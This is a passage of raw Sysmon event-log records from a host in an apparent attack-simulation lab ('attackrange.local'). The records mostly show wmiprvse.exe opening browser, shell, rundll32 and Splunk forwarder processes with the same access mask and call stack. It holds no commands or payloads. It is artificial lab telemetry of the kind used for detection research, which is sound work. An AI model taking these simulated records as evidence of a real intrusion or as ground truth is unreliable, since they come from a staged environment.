Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=964A7BE6562D0181E388C36845B3C768,SHA256=A72C0BB0A004ADB4AC00645773DACDF8710C79270B70286245B4FDF65D642BD4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.405{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.388{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla 